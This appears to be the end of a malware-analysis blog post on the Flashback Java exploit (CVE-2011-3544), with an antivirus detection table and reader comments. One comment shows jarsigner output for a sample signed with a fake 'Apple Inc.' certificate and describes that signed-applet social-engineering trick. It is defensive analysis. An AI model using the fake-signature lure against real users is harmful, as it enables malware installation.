eTrust-Vet     Java/CVE-2011-3544!exploit     20120417
F-Secure     Exploit:Java/Flashback.F     20120417
Fortinet     Java/CVE_2011_3544.GX!exploit     20120416
GData     Java.Exploit.CVE-2011-3544.A     20120417
Ikarus     Exploit.Java.CVE     20120417
Kaspersky     Exploit.Java.CVE-2011-3544.gx     20120417
Microsoft     Exploit:Java/CVE-2011-3544.BY     20120416
NOD32     Java/Exploit.CVE-2011-3544.N     20120417
nProtect     Java.Exploit.CVE-2011-3544.A     20120417
Sophos     Mal/20113544-A     20120417
SUPERAntiSpyware     -     20120402
Symantec     OSX.Flashback     20120417
TrendMicro     JAVA_DROPPR.IC     20120416
TrendMicro-HouseCall     JAVA_DROPPR.IC     20120417
VBA32     Exploit.Java.CVE-2011-3544.gx     20120416
VIPRE     Trojan.Java.Generic (v)     20120416

4 comments:

  1. There was some news that Kaspersky had some software that could fight this Flashfake but simultaneously damages the system therefore they have not to distribute this tool. Java and Flash Player are heaven for malware, unfortunately.

  2. Apple issued a fix/removal/patch a few days ago so just update your Mac.
    F-Secure and Dr.Web have tools too.

  3. Number 2 is not any CVE, it is good old java_signed_applet social engineering exploit. Will show a scary message that you are executing code claiming from "Apple Inc." but whose identity cannot be identified, and hopes the user will click "Run" anyway. Will work on any Java version (starting from 1.2 or so), but requires user interaction.

    The other two CVE numbers look right. Thanks for showing the decompiled versions in your blog, saves some time!


    C:\Temp>jarsigner -verbose -certs -verify D9D193658EA1555124854C3C827E4391

    217 Mon Feb 06 12:02:02 CET 2012 META-INF/MANIFEST.MF
    338 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.SF
    1050 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.DSA
    0 Mon Feb 06 12:01:50 CET 2012 META-INF/
    sm 525 Mon Feb 06 12:01:50 CET 2012 javaupdate/JavaUpdate.class

    X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
    [certificate will expire on 06.05.12 20:02]

    sm 35864 Mon Feb 06 12:01:50 CET 2012 javaupdate/Payload.class

    X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
    [certificate will expire on 06.05.12 20:02]


    s = signature was verified
    m = entry is listed in manifest
    k = at least one certificate was found in keystore
    i = at least one certificate was found in identity scope

    jar verified.

    Warning:
    This jar contains entries whose signer certificate will expire within six months.
